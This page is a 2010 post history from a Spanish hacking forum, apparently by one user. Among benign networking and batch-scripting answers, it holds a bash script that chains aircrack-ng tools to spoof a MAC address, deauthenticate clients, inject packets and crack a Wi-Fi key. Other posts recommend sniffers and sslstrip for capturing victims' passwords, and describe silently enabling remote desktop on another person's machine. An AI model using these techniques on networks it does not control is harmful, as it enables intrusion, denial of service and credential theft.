elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 [56] 57 58 59 60
551  Comunicaciones / Redes / Re: [routers] El escritorio remoto en: 10 Noviembre 2010, 13:25 pm
Si yo también uso vnc, pero es para que se active automáticamente  con un .bat y luego abrir una terminal sin que se entere el usuario del equipo servidor.
Pero creo que eso lo corta un router entonces un .bat que active escritorio remoto no sirve de mucho.
552  Comunicaciones / Redes / [routers] El escritorio remoto en: 10 Noviembre 2010, 10:20 am
Hola

Tengo una duda. Si activamos el escritorio remoto (puerto 3393 o algo así) el equipo en si estará escuchando por ese puerto las peticiones, pero el router dejará conectar? o cortará las peticiones de conexión que le vengan de afuera?

No sabia si poner la pregunta aquí o en Redes así que si está mal ya sabeis.

Gracias de antemano =)
553  Seguridad Informática / Hacking / Re: Sniffer en: 9 Noviembre 2010, 23:58 pm
A mi personalmente me encata la convinación de dsniff, ettercap y sslstrip. Este ultimo coge las conexiones https, lo e probado y funciona, aunque para mi tiene algunos fallos, como por ejemplo que hace falta que la victima se loguee en el momento en el que estas esnifando, si tiene el logueo automatico del navegador ya no coje el password.

Para conversaciones de msg o emesene para mi el mejor es dsniff (msgsnarf) te filtra las conversaciones directamente.
554  Seguridad Informática / Hacking / Re: [MOD] Como saber si alguien esta conectado a Internet (novia celosa etc..) en: 9 Noviembre 2010, 20:20 pm
yo creo que mas que saber si se conecta por la noche tendríais que preguntarles a vuestros novios si se conectan, si te dicen que no confía en el, pues en esos e basa una buena relación, si no es así tranquilas que se delatara el solo.

De todas formas en vez de estar aprendiendo hacking (que no es anda malo) para calmar vuestros celos podríais estar aprendiendo a ser menos celosas y entender que la vida no está para apoderarse de nada ni de nadie sino para disfrutarla con algo o con alguien.
555  Programación / Scripting / Re: tutoriales y codes de ejemplo(batch) en: 8 Noviembre 2010, 12:18 pm
Bajado y hojeado. Mucho material si señor. Gracias Flony =)
556  Comunicaciones / Redes / Re: wireless router con WDS en: 5 Noviembre 2010, 08:59 am
Según tengo entendido el WDS si sirve para conectar dos routers por wifi, lo único que se debe tener en cuenta es introducir bien la MAC en las dos maquinas para enlazarlas y luego también que trabajen en el mismo canal los dos.
El modo bridge no influye en el WDS, el bridge se utiliza para salir a internet, es decir, lo que tu quieres hacer de conectar dos routers para unir una LAN no necesita el bridge porque es una LAN, luego si quieres tener internet dentro de tu LAN y que se comparta en los dos routers tendrás que usar 1 o los 2 para que use el bridge para salir a internet por cable.
En caso de que solo un router tenga salida de cable a internet tendrás que decirle al router que no tiene que envie las peticiones que le llegan de páginas web al router que si que tiene por wifi.

Te aconsejo que si te interesa saber mas sobre conexiones te pases por la pagina de http://guifi.net/

Se trata de una associciación, grupo,... de Catalunya que pretende conectar toda Catalunya como una LAN por wifi (y lo han conseguido en gran medida =) ), es interesante, alomejor encuentras información o ayuda mas concreta en sus foros.
557  Programación / Scripting / Re: BLOQUEAR EDICIÓN DE ARCHIVO BAT en: 4 Noviembre 2010, 23:09 pm
Prueba a compilar el .bat a .exe. Hay muchos programas que lo hacen.
558  Programación / Scripting / Re: [Bash script] Introducir comando en una nueva terminal (SOLUCIONADO) en: 4 Noviembre 2010, 20:51 pm
He estado probando dentro del script al que queria agregarlo y no me a dado el resultado que queria :-\.
Se abre una terminal con el comando que le digo, pero esta no es independiente de la terminal padre ( por así decirlo).
Es decir, cuando ejecuto el comando "gnome-terminal -x bash -c ifconfig" me saca una nueva ventana de terminal pero en la que e introducido el código se queda esperando a que la otra acabe y si hago un ctrl+c a cualquiera de las dos se para la que se ha abierto nueva.

Os pongo el código completo por si es otra cosa la que se me escapa:

Código
  1. #!/bin/bash
  2. iwconfig
  3.  read -p 'introduce el interfaz a usar: ' inter
  4. airmon-ng start $inter
  5.  read -n 4 -p 'introduce el monitor que utilizaras para cambiar su mac: ' mon
  6. ifconfig $mon down
  7. macchanger -m aa:00:aa:00:aa:00 $mon
  8. $macmon == aa:00:aa:00:aa:00
  9. echo 'pulsa control+c cuando veas la red'
  10.   airodump-ng $mon
  11. trap 'ataques' EXIT;
  12.      function ataques()
  13.             {
  14.                 read -p 'introduce el nombre de la red: ' nom ;
  15.                 read -n 17 -p 'introduce la mac: ' mac ;
  16.                 read -n 2 -p 'introduce su canal: ' can ;
  17.                      gnome-terminal -x bash -c "airodump-ng -w $nom -c $can --bssid $mac $mon" ;
  18.                 while [ $SALIR=1 ] ; do
  19.                 read -p 'indica que ataque quieres iniciar:
  20.                          -Autentificacion (1) -Captura de paquetes (2) -DoS a router (3) -Sacar clave (4) -salir (5) : ' ata ;
  21.                 case $ata in
  22.                      1) gnome-terminal -x bash -c "aireplay-ng -1 0 -e $nom -a $mac -h $macmon $mon" ;;
  23.                      2) gnome-terminal -x bash -c "aireplay-ng -3 -e $nom -a $mac -h $macmon $mon" ;;
  24.                      3) gnome-terminal -x bash -c "aireplay-ng -0 0 -e $nom -a $mac $mon" ;;
  25.                      4) gnome-terminal -x bash -c "aircrack-ng ./$nom*.cap" ;;
  26.                      5) break ;;
  27.                      *) echo 'lo escrito no es correcto'
  28.                 esac
  29.                 done
  30.              }

el problema esta en la linea
Código
  1. gnome-terminal -x bash -c "airodump-ng -w $nom -c $can --bssid $mac $mon"

Me abre la nueva terminal con este comando pero no me deja hacer nada en la terminal de origen.

No hay alguna otra manera de que la terminal nueva sea totalmente independiente de la terminal de origen?
559  Programación / Scripting / Re: [Bash script] equivalente de goto en batch para bash en: 4 Noviembre 2010, 15:58 pm
Los he probado todos y en un principio todos sirven (unos van mejor que otros) pero me he dado cuenta mientras los probaba que el fallo en mi código era la forma de salir del bucle. Lo único que me faltaba era cambiar el "SALIR=2" por un simple "break", así que al final me quedo con el código del principio que expuse pero con ese retoque. Aquí lo adjunto:

Código
  1. #!/bin/bash -x
  2. while [ $SALIR=1 ] ; do
  3.    read -p 'indica lo que quieres hacer
  4.              1) un ls 2) un ipconfig 3) Salir ' ata ;
  5.          case $ata in
  6.             1) gnome-terminal -x bash -c "ls|less" ;;
  7.             2) gnome-terminal -x bash -c "ipconfig" ;;
  8.             [color=red]3) Break ;;[/color]
  9.             *) echo 'lo escrito no es correcto'
  10.          esac
  11.    done
  12. read -p 'pulsa intro para salir'

Lo que está en rojo era el fallo retocado del primer codigo.

Ah! y por cierto, ya se que el "goto" no existe en batch pero si de los 4 códigos que se han expuesto tendría que decir el que mas se parece creo que sería el de Hekaly con la rellamada a la función.
560  Programación / Scripting / Re: Por favor ayuda con un .bat que estoy loko ya de pensar!!!!!! en: 4 Noviembre 2010, 15:20 pm
Creo que con un "DIR /p /s c:" te muestra directorios y subdirectorios , pero eso si, la parada la hace cuando se llena la pantalla de información, no cuando pasa a otra subcarpeta. No se si te servirá :-/
-----
Ok creo que lo de arriba no sirve, ya que quieres el contenido de los documentos (me imagino de texto) y no el contenido de la carpeta. No hagas caso al mensaje de arriba. En lo único que te puedo ayudar es que creo que se usa el comando TYPE.
Páginas: 1 ... 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 [56] 57 58 59 60
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines